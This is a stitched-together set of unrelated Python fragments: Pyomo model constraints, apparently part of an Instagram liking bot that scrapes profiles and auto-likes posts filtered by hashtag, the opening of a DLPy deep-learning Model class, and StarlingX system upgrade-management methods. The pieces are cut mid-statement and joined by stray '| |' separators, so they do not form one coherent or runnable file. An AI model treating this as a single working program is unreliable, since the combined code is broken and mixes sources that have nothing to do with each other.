m.c1166 = Constraint(expr= - m.x325 + m.x333 + m.x337 - m.x357 + m.x365 + m.x369 - m.x389 + m.x397 + m.x401 - m.x421
+ m.x429 + m.x433 - m.x453 + m.x461 + m.x465 + m.x785 == 0)
m.c1167 = Constraint(expr= - m.x326 + m.x338 + m.x342 - m.x358 + m.x370 + m.x374 - m.x390 + m.x402 + m.x406 - m.x422
+ m.x434 + m.x438 - m.x454 + m.x466 + m.x470 + m.x786 == 0)
m.c1168 = Constraint(expr= - m.x327 + m.x339 + m.x343 - m.x359 + m.x371 + m.x375 - m.x391 + m.x403 + m.x407 - m.x423
+ m.x435 + m.x439 - m.x455 + m.x467 + m.x471 + m.x787 == 75)
m.c1169 = Constraint(expr= - m.x328 + m.x340 + m.x344 - m.x360 + m.x372 + m.x376 - m.x392 + m.x404 + m.x408 - m.x424
+ m.x436 + m.x440 - m.x456 + m.x468 + m.x472 + m.x788 == 0)
m.c1170 = Constraint(expr= - m.x329 + m.x341 + m.x345 - m.x361 + m.x373 + m.x377 - m.x393 + m.x405 + m.x409 - m.x425
+ m.x437 + m.x441 - m.x457 + m.x469 + m.x473 + m.x789 == 0)
m.c1171 = Constraint(expr= - m.x330 - m.x338 + m.x346 - m.x362 - m.x370 + m.x378 - m.x394 - m.x402 + m.x410 - m.x426
- m.x434 + m.x442 - m.x458 - m.x466 + m.x474 + m.x790 == 0)
m.c1172 = Constraint(expr= - m.x331 - m.x339 + m.x347 - m.x363 - m.x371 + m.x379 - m.x395 - m.x403 + m.x411 - m.x427
- m.x435 + m.x443 - m.x459 - m.x467 + m.x475 + m.x791 == 0)
m.c1173 = Constraint(expr= - m.x332 - m.x340 + m.x348 - m.x364 - m.x372 + m.x380 - m.x396 - m.x404 + m.x412 - m.x428
- m.x436 + m.x444 - m.x460 - m.x468 + m.x476 + m.x792 == 50)
m.c1174 = Constraint(expr= - m.x333 - m.x341 + m.x349 - m.x365 - m.x373 + m.x381 - m.x397 - m.x405 + m.x413 - m.x429
- m.x437 + m.x445 - m.x461 - m.x469 + m.x477 + m.x793 == 0)
m.c1175 = Constraint(expr= - m.x334 - m.x342 + m.x350 - m.x366 - m.x374 + m.x382 - m.x398 - m.x406 + m.x414 - m.x430
- m.x438 + m.x446 - m.x462 - m.x470 + m.x478 + m.x794 == 0)
m.c1176 = Constraint(expr= - m.x335 - m.x343 + m.x351 | |
get_following_status(browser, 'profile',
username, person, None,
logger, logfolder)
if following == 'Following':
following = True
is_private = is_private_profile(browser, logger, following)
if (is_private is None) or (is_private is True and not following) or (
following == 'Blocked'):
return False
# Get links
links = []
main_elem = browser.find_element_by_tag_name('article')
posts_count = get_number_of_posts(browser)
attempt = 0
if posts_count is not None and amount > posts_count:
logger.info(
"You have requested to get {} posts from {}'s profile page BUT"
" there only {} posts available :D".format(amount, person,
posts_count))
amount = posts_count
while len(links) < amount:
initial_links = links
browser.execute_script(
"window.scrollTo(0, document.body.scrollHeight);")
# update server calls after a scroll request
update_activity()
sleep(0.66)
# using `extend` or `+=` results reference stay alive which affects
# previous assignment (can use `copy()` for it)
links = links + get_links(browser, person, logger, media, main_elem)
links = sorted(set(links), key=links.index)
if len(links) == len(initial_links):
if attempt >= 7:
logger.info(
"There are possibly less posts than {} in {}'s profile "
"page!".format(
amount, person))
break
else:
attempt += 1
else:
attempt = 0
if randomize is True:
random.shuffle(links)
return links[:amount]
def check_link(browser, post_link, dont_like, mandatory_words,
mandatory_language, mandatory_character,
is_mandatory_character, check_character_set, ignore_if_contains,
logger):
"""
Check the given link if it is appropriate
:param browser: The selenium webdriver instance
:param post_link:
:param dont_like: hashtags of inappropriate phrases
:param mandatory_words: words of appropriate phrases
:param ignore_if_contains:
:param logger: the logger instance
:return: tuple of
boolean: True if inappropriate,
string: the username,
boolean: True if it is video media,
string: the message if inappropriate else 'None',
string: set the scope of the return value
"""
# Check URL of the webpage, if it already is post's page, then do not
# navigate to it again
web_address_navigator(browser, post_link)
"""Check if the Post is Valid/Exists"""
try:
post_page = browser.execute_script(
"return window._sharedData.entry_data.PostPage")
except WebDriverException: # handle the possible `entry_data` error
try:
browser.execute_script("location.reload()")
update_activity()
post_page = browser.execute_script(
"return window._sharedData.entry_data.PostPage")
except WebDriverException:
post_page = None
if post_page is None:
logger.warning(
'Unavailable Page: {}'.format(post_link.encode('utf-8')))
return True, None, None, 'Unavailable Page', "Failure"
"""Gets the description of the post's link and checks for the dont_like
tags"""
graphql = 'graphql' in post_page[0]
if graphql:
media = post_page[0]['graphql']['shortcode_media']
is_video = media['is_video']
user_name = media['owner']['username']
image_text = media['edge_media_to_caption']['edges']
image_text = image_text[0]['node']['text'] if image_text else None
location = media['location']
location_name = location['name'] if location else None
owner_comments = browser.execute_script('''
latest_comments = window._sharedData.entry_data.PostPage[
0].graphql.shortcode_media.edge_media_to_comment.edges;
if (latest_comments === undefined) {
latest_comments = Array();
owner_comments = latest_comments
.filter(item => item.node.owner.username == arguments[0])
.map(item => item.node.text)
.reduce((item, total) => item + '\\n' + total, '');
return owner_comments;}
else {
return null;}
''', user_name)
else:
media = post_page[0]['media']
is_video = media['is_video']
user_name = media['owner']['username']
image_text = media['caption']
owner_comments = browser.execute_script('''
latest_comments = window._sharedData.entry_data.PostPage[
0].media.comments.nodes;
if (latest_comments === undefined) {
latest_comments = Array();
owner_comments = latest_comments
.filter(item => item.user.username == arguments[0])
.map(item => item.text)
.reduce((item, total) => item + '\\n' + total, '');
return owner_comments;}
else {
return null;}
''', user_name)
if owner_comments == '':
owner_comments = None
"""Append owner comments to description as it might contain further tags"""
if image_text is None:
image_text = owner_comments
elif owner_comments:
image_text = image_text + '\n' + owner_comments
"""If the image still has no description gets the first comment"""
if image_text is None:
if graphql:
image_text = media['edge_media_to_comment']['edges']
image_text = image_text[0]['node']['text'] if image_text else None
else:
image_text = media['comments']['nodes']
image_text = image_text[0]['text'] if image_text else None
if image_text is None:
image_text = "No description"
logger.info('Image from: {}'.format(user_name.encode('utf-8')))
logger.info('Link: {}'.format(post_link.encode('utf-8')))
logger.info('Description: {}'.format(image_text.encode('utf-8')))
"""Check if mandatory character set, before adding the location to the
text"""
if mandatory_language:
if not check_character_set(image_text):
return True, user_name, is_video, 'Mandatory language not ' \
'fulfilled', "Not mandatory " \
"language"
"""Append location to image_text so we can search through both in one
go."""
if location_name:
logger.info('Location: {}'.format(location_name.encode('utf-8')))
image_text = image_text + '\n' + location_name
if mandatory_words:
if not any((word in image_text for word in mandatory_words)):
return True, user_name, is_video, 'Mandatory words not ' \
'fulfilled', "Not mandatory " \
"likes"
image_text_lower = [x.lower() for x in image_text]
ignore_if_contains_lower = [x.lower() for x in ignore_if_contains]
if any((word in image_text_lower for word in ignore_if_contains_lower)):
return False, user_name, is_video, 'None', "Pass"
dont_like_regex = []
for dont_likes in dont_like:
if dont_likes.startswith("#"):
dont_like_regex.append(dont_likes + "([^\d\w]|$)")
elif dont_likes.startswith("["):
dont_like_regex.append("#" + dont_likes[1:] + "[\d\w]+([^\d\w]|$)")
elif dont_likes.startswith("]"):
dont_like_regex.append("#[\d\w]+" + dont_likes[1:] + "([^\d\w]|$)")
else:
dont_like_regex.append(
"#[\d\w]*" + dont_likes + "[\d\w]*([^\d\w]|$)")
for dont_likes_regex in dont_like_regex:
quash = re.search(dont_likes_regex, image_text, re.IGNORECASE)
if quash:
quashed = \
(((quash.group(0)).split('#')[1]).split(' ')[0]).split('\n')[
0].encode(
'utf-8') # dismiss possible space and newlines
iffy = ((re.split(r'\W+', dont_likes_regex))[
3] if dont_likes_regex.endswith(
'*([^\\d\\w]|$)') else # 'word' without format
(re.split(r'\W+', dont_likes_regex))[
1] if dont_likes_regex.endswith(
'+([^\\d\\w]|$)') else # '[word'
(re.split(r'\W+', dont_likes_regex))[
3] if dont_likes_regex.startswith(
'#[\\d\\w]+') else # ']word'
(re.split(r'\W+', dont_likes_regex))[1]) # '#word'
inapp_unit = 'Inappropriate! ~ contains "{}"'.format(
quashed if iffy == quashed else
'" in "'.join([str(iffy), str(quashed)]))
return True, user_name, is_video, inapp_unit, "Undesired word"
return False, user_name, is_video, 'None', "Success"
def like_image(browser, username, blacklist, logger, logfolder):
"""Likes the browser opened image"""
# check action availability
if quota_supervisor("likes") == "jump":
return False, "jumped"
like_xpath = "//section/span/button/span[@aria-label='Like']"
unlike_xpath = "//section/span/button/span[@aria-label='Unlike']"
# find first for like element
like_elem = browser.find_elements_by_xpath(like_xpath)
if len(like_elem) == 1:
# sleep real quick right before clicking the element
sleep(2)
click_element(browser, like_elem[0])
# check now we have unlike instead of like
liked_elem = browser.find_elements_by_xpath(unlike_xpath)
if len(liked_elem) == 1:
logger.info('--> Image Liked!')
update_activity('likes')
if blacklist['enabled'] is True:
action = 'liked'
add_user_to_blacklist(
username, blacklist['campaign'], action, logger, logfolder)
# get the post-like delay time to sleep
naply = get_action_delay("like")
sleep(naply)
return True, "success"
else:
# if like not seceded wait for 2 min
logger.info('--> Image was not able to get Liked! maybe blocked ?')
sleep(120)
else:
liked_elem = browser.find_elements_by_xpath(unlike_xpath)
if len(liked_elem) == 1:
logger.info('--> Image already liked!')
return False, "already liked"
logger.info('--> Invalid Like Element!')
return False, "invalid element"
def get_tags(browser, url):
"""Gets all the tags of the given description in the url"""
# Check URL of the webpage, if it already is the one to be navigated,
# then do not navigate to it again
web_address_navigator(browser, url)
graphql = browser.execute_script(
"return ('graphql' in window._sharedData.entry_data.PostPage[0])")
if graphql:
image_text = browser.execute_script(
"return window._sharedData.entry_data.PostPage[0].graphql."
"shortcode_media.edge_media_to_caption.edges[0].node.text")
else:
image_text = browser.execute_script(
"return window._sharedData.entry_data."
"PostPage[0].media.caption.text")
tags = findall(r'#\w*', image_text)
return tags
def get_links(browser, page, logger, media, element):
# Get image links in scope from hashtag, location and other pages
link_elems = element.find_elements_by_tag_name('a')
sleep(2)
links = []
try:
if link_elems:
new_links = [link_elem.get_attribute('href') for link_elem in
link_elems
if link_elem and link_elem.text in media]
links.extend(new_links)
else:
logger.info("'{}' page does not contain a picture".format(page))
except BaseException as e:
logger.error("link_elems error {}".format(str(e)))
return links
def verify_liking(browser, max, min, logger):
""" Get the amount of existing existing likes and compare it against max
& min values defined by user """
try:
likes_count = browser.execute_script(
"return window._sharedData.entry_data."
"PostPage[0].graphql.shortcode_media.edge_media_preview_like"
".count")
except WebDriverException:
try:
browser.execute_script("location.reload()")
update_activity()
likes_count = browser.execute_script(
"return window._sharedData.entry_data."
"PostPage[0].graphql.shortcode_media.edge_media_preview_like"
".count")
except WebDriverException:
try:
likes_count = (browser.find_element_by_css_selector(
"section._1w76c._nlmjy > div > a > span").text)
if likes_count:
likes_count = format_number(likes_count)
else:
logger.info(
"Failed to check likes' count ~empty string\n")
return True
except NoSuchElementException:
logger.info("Failed to check likes' count\n")
return True
if max is not None and likes_count > max:
logger.info(
"Not liked this post! ~more likes exist off maximum limit at "
"{}".format(likes_count))
return False
elif min is not None and likes_count < min:
logger.info(
"Not liked this post! ~less likes exist off minumum limit "
"at {}".format(likes_count)
)
return False
return True
def like_comment(browser, original_comment_text, logger):
""" Like the given comment """
comments_block_XPath = "//div/div/h3/../../../.." # quite an efficient
# location path
try:
comments_block = browser.find_elements_by_xpath(comments_block_XPath)
for comment_line in comments_block:
comment_elem = comment_line.find_elements_by_tag_name("span")[0]
comment = extract_text_from_element(comment_elem)
if comment and (comment == original_comment_text):
# like the given comment
comment_like_button = comment_line.find_element_by_tag_name(
"button")
click_element(browser, comment_like_button)
# verify if like succeeded by waiting until the like button
# element goes stale..
button_change = explicit_wait(browser, "SO",
[comment_like_button], logger, 7,
False)
if button_change:
logger.info("--> Liked the comment!")
sleep(random.uniform(1, 2))
return True, | |
<reponame>jld23/python-dlpy<filename>dlpy/model.py
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' The Model class adds training, evaluation, tuning and feature analysis routines to a Network '''
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import collections
import sys
from .utils import image_blocksize, unify_keys, input_table_check, random_name, check_caslib, caslibify
from .utils import filter_by_image_id, filter_by_filename, isnotebook
from dlpy.timeseries import TimeseriesTable
from dlpy.timeseries import _get_first_obs, _get_last_obs, _combine_table, _prepare_next_input
from dlpy.utils import DLPyError, Box, DLPyDict
from dlpy.lr_scheduler import _LRScheduler, FixedLR, StepLR, FCMPLR
from dlpy.network import Network
class Model(Network):
valid_res = None
feature_maps = None
valid_conf_mat = None
valid_score = None
n_epochs = 0
training_history = None
model_explain_table = None
valid_res_tbl = None
model_ever_trained = False
train_tbl = None
valid_tbl = None
score_message_level = 'note'
def change_labels(self, label_file, id_column, label_column):
'''
Overrides the labels already in the model
The label_file should be a csv file that has two columns: 1) id
column that contains ids starting from 0 and 2) label column that
contains the labels. This file should also have header columns
and those should be passed to this function (i.e., id_column and
label_column)
Parameters
----------
label_file : string
Specifies the name of the file that contains the new labels.
id_column : string
Specifies the name of the id column in label_file.
label_column : string
Specifies the name of the label column in label file.
'''
if self.model_weights is not None:
temp_name = random_name('new_label_table', 6)
temp_model_name = random_name('new_weights_table', 6)
labels = pd.read_csv(label_file, skipinitialspace=True, index_col=False)
self.conn.upload_frame(labels, casout=dict(name=temp_name, replace=True),
importoptions={'vars':[
{'name': id_column, 'type': 'int64'},
{'name': label_column, 'type': 'char', 'length': 20}
]})
rt = self._retrieve_('deeplearn.dllabeltarget', initWeights=self.model_weights,
modelTable=self.model_table, modelWeights=temp_model_name,
labelTable=temp_name)
if rt.severity == 0:
self.model_weights = self.conn.CASTable(temp_model_name)
else:
for m in rt.messages:
print(m)
raise DLPyError('Seems like something went well while changing the labels')
else:
raise DLPyError('We do not have any weights yet')
def get_model_info(self):
'''
Return the information about the model table
Returns
-------
:class:`CASResults`
'''
return self._retrieve_('deeplearn.modelinfo', modelTable=self.model_table)
def fit(self, data, inputs=None, target=None, data_specs=None, mini_batch_size=1, max_epochs=5, log_level=3,
lr=0.01, optimizer=None, nominals=None, texts=None, target_sequence=None, sequence=None, text_parms=None,
valid_table=None, valid_freq=1, gpu=None, attributes=None, weight=None, seed=0, record_seed=0,
missing='mean', target_missing='mean', repeat_weight_table=False, force_equal_padding=None,
save_best_weights=False, n_threads=None, target_order='ascending'):
"""
Fitting a deep learning model.
Note that this function surfaces several parameters from other parameters. For example,
while learning rate is a parameter of Solver (that is a parameter of Optimizer), it is leveled up
so that our users can easily set learning rate without changing the default optimizer and solver.
If a non-default solver or optimizer is passed, then these leveled-up
parameters will be ignored - even they are set - and the ones coming from
the custom solver and custom optimizer will be used. In addition to learning_rate (lr),
max_epochs and log_level are another examples of such parameters.
Parameters
----------
data : string
This is the input data. It might be a string that is the
name of a cas table. Alternatively, this might be a cas table.
inputs : string or list-of-strings, optional
Specifies the input variables to use in the analysis.
target : string or list-of-strings, optional
Specifies the target sequence variables to use in the analysis.
data_specs : :class:`DataSpec`, optional
Specifies the parameters for the multiple input cases.
mini_batch_size : int, optional
Specifies the number of observations per thread in a
mini-batch. You can use this parameter to control the number of
observations that the action uses on each worker for each thread
to compute the gradient prior to updating the weights. Larger
values use more memory. When synchronous SGD is used (the
default), the total mini-batch size is equal to
miniBatchSize * number of threads * number of workers. When
asynchronous SGD is used (by specifying the elasticSyncFreq
parameter), each worker trains its own local model. In this case,
the total mini-batch size for each worker is
miniBatchSize * number of threads.
max_epochs : int, optional
specifies the maximum number of epochs. For SGD with a
single-machine server or a session that uses one worker on a
distributed server, one epoch is reached when the action passes
through the data one time. For a session that uses more than one
worker, one epoch is reached when all the workers exchange the
weights with the controller one time. The syncFreq parameter
specifies the number of times each worker passes through the
data before exchanging weights with the controller. For L-BFGS
with full batch, each L-BFGS iteration might process more than
one epoch, and final number of epochs might exceed the maximum
number of epochs.
log_level : int, optional
Specifies how progress messages are sent to the client. The
default value, 0, indicates that no messages are sent. Specify 1
to receive start and end messages. Specify 2 to include the
iteration history.
lr : double, optional
Specifies the learning rate.
optimizer : :class:`Optimizer`, optional
Specifies the parameters for the optimizer.
nominals : string or list-of-strings, optional
Specifies the nominal input variables to use in the analysis.
texts : string or list-of-strings, optional
Specifies the character variables to treat as raw text.
These variables must be specified in the inputs parameter.
target_sequence : string or list-of-strings, optional
Specifies the target sequence variables to use in the analysis.
sequence : :class:`Sequence`, optional
Specifies the settings for sequence data.
text_parms : :class:`TextParms`, optional
Specifies the parameters for the text inputs.
valid_table : string or CASTable, optional
Specifies the table with the validation data. The validation
table must have the same columns and data types as the training table.
valid_freq : int, optional
Specifies the frequency for scoring the validation table.
gpu : :class:`Gpu`, optional
When specified, the action uses graphical processing unit hardware.
The simplest way to use GPU processing is to specify "gpu=1".
In this case, the default values of other GPU parameters are used.
Setting gpu=1 enables all available GPU devices for use. Setting
gpu=0 disables GPU processing.
attributes : string or list-of-strings, optional
Specifies temporary attributes, such as a format, to apply to
input variables.
weight : string, optional
Specifies the variable/column name in the input table containing the
prior weights for the observation.
seed : double, optional
specifies the random number seed for the random number generator
in SGD. The default value, 0, and negative values indicate to use
random number streams based on the computer clock. Specify a value
that is greater than 0 for a reproducible random number sequence.
record_seed : double, optional
specifies the random number seed for the random record selection
within a worker. The default value 0 disables random record selection.
Records are read as they are laid out in memory.
Negative values indicate to use random number streams based on the
computer clock.
missing : string, optional
Specifies the policy for replacing missing values with imputed values.
Valid Values: MAX, MIN, MEAN, NONE
Default: MEAN
target_missing : string, optional
Specifies the policy for replacing target missing values with
imputed values.
Valid Values: MAX, MIN, MEAN, NONE
Default: MEAN
repeat_weight_table : bool, optional
Replicates the entire weight table on each worker node when saving
weights.
Default: False
force_equal_padding : bool, optional
For convolution or pooling layers, this setting forces left padding
to equal right padding, and top padding to equal bottom padding.
This setting might result in an output image that is
larger than the input image.
Default: False
save_best_weights : bool, optional
When set to True, it keeps the weights that provide the smallest
loss error.
n_threads : int, optional
Specifies | |
# Check if there is an upgrade in progress
try:
upgrade = self.dbapi.software_upgrade_get_one()
except exception.NotFound:
# No upgrade in progress
pass
else:
# Check if controller-1 has finished its data migration
if (host.hostname == constants.CONTROLLER_1_HOSTNAME and
host_upgrade.software_load == upgrade.to_load and
upgrade.state == constants.UPGRADE_DATA_MIGRATION_COMPLETE):
LOG.info("Finished upgrade of %s" %
constants.CONTROLLER_1_HOSTNAME)
# Update upgrade state
upgrade_update = {
'state': constants.UPGRADE_UPGRADING_CONTROLLERS}
self.dbapi.software_upgrade_update(upgrade.uuid,
upgrade_update)
if (host.hostname == constants.CONTROLLER_0_HOSTNAME and
host_upgrade.software_load == upgrade.to_load):
# Clear VIM upgrade flag once controller_0 has been upgraded
# This allows VM management
try:
vim_api.set_vim_upgrade_state(host, False)
except Exception as e:
LOG.exception(e)
raise exception.SysinvException(_(
"Failure clearing VIM host upgrade state"))
# If we are in the upgrading controllers state and controller-0
# is running the new release, update the upgrade state
if upgrade.state == constants.UPGRADE_UPGRADING_CONTROLLERS:
upgrade_update = {
'state': constants.UPGRADE_UPGRADING_HOSTS}
self.dbapi.software_upgrade_update(upgrade.uuid,
upgrade_update)
def start_upgrade(self, context, upgrade):
""" Start the upgrade"""
from_load = self.dbapi.load_get(upgrade.from_load)
from_version = from_load.software_version
to_load = self.dbapi.load_get(upgrade.to_load)
to_version = to_load.software_version
controller_0 = self.dbapi.ihost_get_by_hostname(
constants.CONTROLLER_0_HOSTNAME)
# Prepare for upgrade
LOG.info("Preparing for upgrade from release: %s to release: %s" %
(from_version, to_version))
try:
# Extract N+1 packages necessary for installation of controller-1
# (ie. installer images, kickstarts)
subprocess.check_call(['/usr/sbin/upgrade-start-pkg-extract',
'-r', to_version])
if tsc.system_mode == constants.SYSTEM_MODE_SIMPLEX:
LOG.info("Generating agent request to create simplex upgrade "
"data")
software_upgrade = self.dbapi.software_upgrade_get_one()
rpcapi = agent_rpcapi.AgentAPI()
rpcapi.create_simplex_backup(context, software_upgrade)
return
else:
i_system = self.dbapi.isystem_get_one()
upgrades_management.prepare_upgrade(
from_version, to_version, i_system)
LOG.info("Finished upgrade preparation")
except Exception:
LOG.exception("Upgrade preparation failed")
with excutils.save_and_reraise_exception():
if tsc.system_mode != constants.SYSTEM_MODE_SIMPLEX:
vim_api.set_vim_upgrade_state(controller_0, False)
upgrades_management.abort_upgrade(from_version, to_version,
upgrade)
# Delete upgrade record
self.dbapi.software_upgrade_destroy(upgrade.uuid)
# Raise alarm to show an upgrade is in progress
entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
constants.CONTROLLER_HOSTNAME)
fault = fm_api.Fault(
alarm_id=fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
alarm_state=fm_constants.FM_ALARM_STATE_SET,
entity_type_id=fm_constants.FM_ENTITY_TYPE_HOST,
entity_instance_id=entity_instance_id,
severity=fm_constants.FM_ALARM_SEVERITY_MINOR,
reason_text="System Upgrade in progress.",
# operational
alarm_type=fm_constants.FM_ALARM_TYPE_7,
# congestion
probable_cause=fm_constants.ALARM_PROBABLE_CAUSE_8,
proposed_repair_action="No action required.",
service_affecting=False)
fm_api.FaultAPIs().set_fault(fault)
self.dbapi.software_upgrade_update(
upgrade.uuid, {'state': constants.UPGRADE_STARTED})
def activate_upgrade(self, context, upgrade):
"""Activate the upgrade. Generate and apply new manifests.
"""
# TODO Move upgrade methods to another file
from_load = self.dbapi.load_get(upgrade.from_load)
from_version = from_load.software_version
to_load = self.dbapi.load_get(upgrade.to_load)
to_version = to_load.software_version
self.dbapi.software_upgrade_update(
upgrade.uuid, {'state': constants.UPGRADE_ACTIVATING})
# Ask upgrade management to activate the upgrade
try:
i_system = self.dbapi.isystem_get_one()
upgrades_management.activate_upgrade(from_version,
to_version, i_system)
LOG.info("Finished upgrade activation")
except Exception:
LOG.exception("Upgrade activation failed")
with excutils.save_and_reraise_exception():
# mark the activation as failed. The intention
# is for the user to retry activation once they
# have resolved the cause for failure
self.dbapi.software_upgrade_update(
upgrade.uuid,
{'state': constants.UPGRADE_ACTIVATION_FAILED})
def complete_upgrade(self, context, upgrade, state):
""" Complete the upgrade"""
from_load = self.dbapi.load_get(upgrade.from_load)
from_version = from_load.software_version
to_load = self.dbapi.load_get(upgrade.to_load)
to_version = to_load.software_version
controller_0 = self.dbapi.ihost_get_by_hostname(
constants.CONTROLLER_0_HOSTNAME)
# TODO: This code is only useful for supporting R5 to R6 upgrades.
# Remove in future release.
# update crushmap and remove cache-tier on upgrade
if from_version == tsc.SW_VERSION_1803:
ceph_backend = StorageBackendConfig.get_backend(self.dbapi, constants.CINDER_BACKEND_CEPH)
if ceph_backend and ceph_backend.state == constants.SB_STATE_CONFIGURED:
try:
response, body = self._ceph_api.osd_crush_rule_rm("cache_tier_ruleset",
body='json')
if response.ok:
LOG.info("Successfully removed cache_tier_ruleset "
"[ceph osd crush rule rm cache_tier_ruleset]")
try:
response, body = self._ceph_api.osd_crush_remove("cache-tier",
body='json')
if response.ok:
LOG.info("Successfully removed cache_tier "
"[ceph osd crush remove cache-tier]")
except exception.CephFailure:
LOG.warn("Failed to remove bucket cache-tier from crushmap")
pass
except exception.CephFailure:
LOG.warn("Failed to remove rule cache-tier from crushmap")
pass
if state in [constants.UPGRADE_ABORTING,
constants.UPGRADE_ABORTING_ROLLBACK]:
if upgrade.state != constants.UPGRADE_ABORT_COMPLETING:
raise exception.SysinvException(
_("Unable to complete upgrade-abort: Upgrade not in %s "
"state.") % constants.UPGRADE_ABORT_COMPLETING)
LOG.info(
"Completing upgrade abort from release: %s to release: %s" %
(from_version, to_version))
upgrades_management.abort_upgrade(from_version, to_version, upgrade)
if (tsc.system_type == constants.SYSTEM_MODE_DUPLEX and
tsc.system_type == constants.TIS_AIO_BUILD and
state == constants.UPGRADE_ABORTING_ROLLBACK):
# For AIO Case, VM goes into no state when Controller-0 becomes active
# after swact. nova clean up will fail the instance and restart
# nova-compute service
LOG.info("Calling nova cleanup")
with open(os.devnull, "w") as fnull:
try:
subprocess.check_call(["systemctl", "start", "nova-cleanup"],
stdout=fnull,
stderr=fnull)
except subprocess.CalledProcessError:
raise exception.SysinvException(_(
"Failed to call nova cleanup during AIO abort"))
try:
vim_api.set_vim_upgrade_state(controller_0, False)
except Exception:
LOG.exception()
raise exception.SysinvException(_(
"upgrade-abort rejected: unable to reset VIM upgrade "
"state"))
LOG.info("Finished upgrade abort")
else:
if upgrade.state != constants.UPGRADE_COMPLETING:
raise exception.SysinvException(
_("Unable to complete upgrade: Upgrade not in %s state.")
% constants.UPGRADE_COMPLETING)
# Force all host_upgrade entries to use the new load
# In particular we may have host profiles created in the from load
# that we need to update before we can delete the load.
hosts = self.dbapi.host_upgrade_get_list()
for host_upgrade in hosts:
if (host_upgrade.target_load == from_load.id or
host_upgrade.software_load == from_load.id):
LOG.info(_("Updating host id: %s to use load id: %s")
% (host_upgrade.forihostid, upgrade.to_load))
self.dbapi.host_upgrade_update(
host_upgrade.id,
{"software_load": upgrade.to_load,
"target_load": upgrade.to_load})
# Complete the upgrade
LOG.info("Completing upgrade from release: %s to release: %s" %
(from_version, to_version))
upgrades_management.complete_upgrade(from_version, to_version)
LOG.info("Finished completing upgrade")
# Delete upgrade record
self.dbapi.software_upgrade_destroy(upgrade.uuid)
# Clear upgrades alarm
entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
constants.CONTROLLER_HOSTNAME)
fm_api.FaultAPIs().clear_fault(
fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
entity_instance_id)
def abort_upgrade(self, context, upgrade):
""" Abort the upgrade"""
from_load = self.dbapi.load_get(upgrade.from_load)
from_version = from_load.software_version
to_load = self.dbapi.load_get(upgrade.to_load)
to_version = to_load.software_version
LOG.info("Aborted upgrade from release: %s to release: %s" %
(from_version, to_version))
updates = {'state': constants.UPGRADE_ABORTING}
controller_0 = self.dbapi.ihost_get_by_hostname(
constants.CONTROLLER_0_HOSTNAME)
host_upgrade = self.dbapi.host_upgrade_get_by_host(
controller_0.id)
if host_upgrade.target_load == to_load.id:
updates['state'] = constants.UPGRADE_ABORTING_ROLLBACK
rpc_upgrade = self.dbapi.software_upgrade_update(
upgrade.uuid, updates)
# make sure the to/from loads are in the correct state
self.dbapi.set_upgrade_loads_state(
upgrade,
constants.IMPORTED_LOAD_STATE,
constants.ACTIVE_LOAD_STATE)
self._puppet.update_system_config()
self._puppet.update_secure_system_config()
# When we abort from controller-1 while controller-0 is running
# the previous release, controller-0 will not be aware of the abort.
# We set the following flag so controller-0 will know we're
# aborting the upgrade and can set it's database accordingly
if tsc.system_mode != constants.SYSTEM_MODE_SIMPLEX:
if updates['state'] == constants.UPGRADE_ABORTING:
controller_1 = self.dbapi.ihost_get_by_hostname(
constants.CONTROLLER_1_HOSTNAME)
c1_host_upgrade = self.dbapi.host_upgrade_get_by_host(
controller_1.id)
if utils.is_host_active_controller(controller_1) and \
c1_host_upgrade.target_load == to_load.id:
abort_flag = os.path.join(
tsc.PLATFORM_PATH, 'config', from_version,
tsc.UPGRADE_ABORT_FILE)
open(abort_flag, "w").close()
return rpc_upgrade
def complete_simplex_backup(self, context, success):
"""Complete the simplex upgrade start process
:param context: request context.
:param success: If the create_simplex_backup call completed
"""
try:
upgrade = self.dbapi.software_upgrade_get_one()
except exception.NotFound:
LOG.error("Software upgrade record not found")
return
from_version = upgrade.from_release
to_version = upgrade.to_release
if not success:
# The upgrade start data collection failed, stop the upgrade
upgrades_management.abort_upgrade(from_version, to_version,
upgrade)
# Delete upgrade record
self.dbapi.software_upgrade_destroy(upgrade.uuid)
LOG.info("Simplex upgrade start failed")
else:
LOG.info("Simplex upgrade start completed")
# Raise alarm to show an upgrade is in progress
entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
constants.CONTROLLER_HOSTNAME)
fault = fm_api.Fault(
alarm_id=fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
alarm_state=fm_constants.FM_ALARM_STATE_SET,
entity_type_id=fm_constants.FM_ENTITY_TYPE_HOST,
entity_instance_id=entity_instance_id,
severity=fm_constants.FM_ALARM_SEVERITY_MINOR,
reason_text="System Upgrade in progress.",
# operational
alarm_type=fm_constants.FM_ALARM_TYPE_7,
# congestion
probable_cause=fm_constants.ALARM_PROBABLE_CAUSE_8,
proposed_repair_action="No action required.",
service_affecting=False)
fm_api.FaultAPIs().set_fault(fault)
self.dbapi.software_upgrade_update(
upgrade.uuid, {'state': constants.UPGRADE_STARTED})
return
def get_system_health(self, context, force=False, upgrade=False):
"""
Performs a system health check.
:param context: request context.
:param force: set to true to ignore minor and warning alarms
:param upgrade: set to true to perform an upgrade health check
"""
health_util = health.Health(self.dbapi)
if upgrade is True:
return health_util.get_system_health_upgrade(context=context,
force=force)
else:
return health_util.get_system_health(context=context,
force=force)
def _get_cinder_address_name(self, network_type):
ADDRESS_FORMAT_ARGS = (constants.CONTROLLER_HOSTNAME,
network_type)
return "%s-cinder-%s" % ADDRESS_FORMAT_ARGS
def reserve_ip_for_first_storage_node(self, context):
"""
Reserve ip address for the first storage node for Ceph monitor
when installing Ceph as a second backend
:param context: request context.
"""
network = self.dbapi.network_get_by_type(constants.NETWORK_TYPE_MGMT)
address_name = cutils.format_address_name(
constants.STORAGE_0_HOSTNAME, constants.NETWORK_TYPE_MGMT)
try:
self.dbapi.address_get_by_name(address_name)
